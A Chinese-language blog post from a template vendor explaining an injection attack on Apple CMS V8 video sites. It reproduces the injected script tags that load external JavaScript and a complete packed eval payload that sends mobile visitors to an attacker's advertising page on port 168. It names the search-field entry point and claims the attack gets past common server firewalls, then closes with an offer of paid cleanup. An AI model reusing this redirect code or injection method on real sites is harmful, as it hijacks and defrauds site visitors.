做網(wǎng)站最鬧心的就是兩種情況，一種網(wǎng)站被引擎拔毛沒(méi)了流量，另外一種就是網(wǎng)站被一些無(wú)恥之徒惡意掛馬，惡心得一米。很多小白站長(zhǎng)總是嘆息：為什么我們好好做站就是被人家搞，我好難啊！

     這不織夢(mèng)模板網(wǎng)小編最近老是接到一些用戶的咨詢反饋：蘋(píng)果CMS V8被入侵?jǐn)?shù)據(jù)庫(kù)表字段d_name被惡意掛馬怎么辦。如下圖所示：

從上面的圖中我們不能看出蘋(píng)果CMS的影視系統(tǒng)在其標(biāo)題字段d_name中被人惡意掛上一段JS 的跳轉(zhuǎn)代碼。

<script src=https://lefengtv.com/js/tjj.js></script><script src=https://www.kilin.xyz/1.js>

目前在織夢(mèng)模板小編這邊反饋的大概是以上2個(gè)JS跳轉(zhuǎn)代碼，可以看得出來(lái)，經(jīng)過(guò)分析我們得知這個(gè)是基本是同一個(gè)人搞的入侵，幾乎是市面上80%的蘋(píng)果CMS V8系統(tǒng)都中招了。除了上面的標(biāo)題被惡意掛馬，還有很多JS也被惡意寫(xiě)如了跳轉(zhuǎn)代碼，如下：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'//w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('//b'+e(c)+'//b','g'),k[c]);return p;}('4.5(/'<6 1="3/2"7="//0.b.c.d/8.0"><///9/'+/'a>/');',14,14,'js|type|javascript|text|document|write|script|src|20569875|scr|ipt|users|51|la'.split('|'),0,{}));var abcdefg=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(abcdefg){setTimeout('window.location.href="https://m.zhuanjiyin.net:168/index.html?u=80666"',500)}

上面惡意代碼對(duì)訪問(wèn)用戶進(jìn)行了判斷，如果是手機(jī)端的，IOS，安卓，以及平板都會(huì)跳轉(zhuǎn)到攻擊者設(shè)置好的廣告網(wǎng)頁(yè)當(dāng)中去，https://m.zhuanjiyin.net:168/index.html?u=80666就是跳轉(zhuǎn)到這里，根據(jù)織夢(mèng)模板小編安全技術(shù)的分析與統(tǒng)計(jì)，大部分被攻擊的網(wǎng)站跳轉(zhuǎn)都是168端口的網(wǎng)址上，域名經(jīng)常變換，但是168端口。

       經(jīng)過(guò)我們技術(shù)的發(fā)現(xiàn)該漏洞通過(guò)post index.php搜索功能進(jìn)行插入數(shù)據(jù)庫(kù)并嵌入掛馬代碼，漏洞產(chǎn)生的原因是電影搜索里可以插入惡意代碼，攻擊者將惡意代碼加密后，不管你服務(wù)器用云鎖，還是寶塔，安全狗，都是攔截不了的，還是會(huì)被篡改。

     這個(gè)問(wèn)題不是普通的用戶和站長(zhǎng)就能處理的，遇到這樣的問(wèn)題建議您聯(lián)系專業(yè)的人員或機(jī)構(gòu)幫您徹底處理，亦或這聯(lián)系我們的在線客服幫您有償處理。